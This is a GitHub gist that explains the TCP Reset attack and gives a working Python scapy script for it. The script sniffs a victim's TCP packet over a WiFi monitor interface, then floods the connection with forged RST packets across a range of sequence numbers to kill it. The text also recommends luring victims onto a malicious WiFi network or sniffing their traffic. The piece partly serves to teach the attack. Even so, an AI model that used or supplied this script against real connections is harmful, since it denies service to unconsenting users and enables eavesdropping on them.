Skip to content

Instantly share code, notes, and snippets.

@spinpx

spinpx/tcp-reset.org

Last active March 1, 2024 17:39
Show Gist options
  • Star 15 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
  • Save spinpx/263a2ed86f974a55d35cf6c3a2541dc2 to your computer and use it in GitHub Desktop.
Save spinpx/263a2ed86f974a55d35cf6c3a2541dc2 to your computer and use it in GitHub Desktop.
Download ZIP
TCP Reset attack in practice #Security #Network
Raw
tcp-reset.org

TCP Reset attack

RESET is a flag in TCP packets to indicate that the conection is not longer working. So, if any of the two participants in a TCP connection send a packet contains such a RESET flag, the connection will be closed immediately.

Thus it can be use to attack TCP connections once the attacker can forge TCP packets from any of the two parties if he or she know their IPs, ports and the sequence number of current TCP connection.

The attack can be used to make certain users to fail to use certain network services based on TCP if we know the information above.

In practice, we should eavesdrop the victims’ communications to get their IPs, ports and the sequence number. You can do it by:

  • Trick them to connect a malicious WiFi, or use other ways to hijack their communications.
  • Sniff WiFi packets if they are near you and using WiFi.

We can filter the TCP packets and find the newest packets that we want to attack.

We can sends a TCP packet with RESET flag and the IPs and ports of source and destination are sniffed from victims. What’s more, the sequence number will increase in TCP communication, its value should be equal or lager than the ack value from the lastest packet the sender received and in the window of receiver. So we should update it. To ensure successful, we can send lots of packets with different sequence number which is larger than the sniffed ack field.

We can implement the TCP Reset attack with scapy in Python. The code is in tcp-reset.py.

Useful reference:

  • Watson, P.: Slipping in the Window: TCP Reset attacks. (2004)
Raw
tcp-reset.py
win=512
tcp_rst_count = 10
victim_ip = "192.168.1.1"
your_iface = "mon0"
# get a tcp packet by sniffing WiFi
t = sniff(iface=your_iface, count=1,
lfilter=lambda x: x.haslayer(TCP)
and x[IP].src == victim_ip)
t = t[0]
tcpdata = {
'src': t[IP].src,
'dst': t[IP].dst,
'sport': t[TCP].sport,
'dport': t[TCP].dport,
'seq': t[TCP].seq,
'ack': t[TCP].ack
}
max_seq = tcpdata['ack'] + tcp_rst_count * win
seqs = range(tcpdata['ack'], max_seq, int(win / 2))
p = IP(src=tcpdata['dst'], dst=tcpdata['src']) / \
TCP(sport=tcpdata['dport'], dport=tcpdata['sport'],
flags="R", window=win, seq=seqs[0])
for seq in seqs:
p.seq = seq
send(p, verbose=0, iface=your_iface)
print(mColor.success('tcp reset attack finish'))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment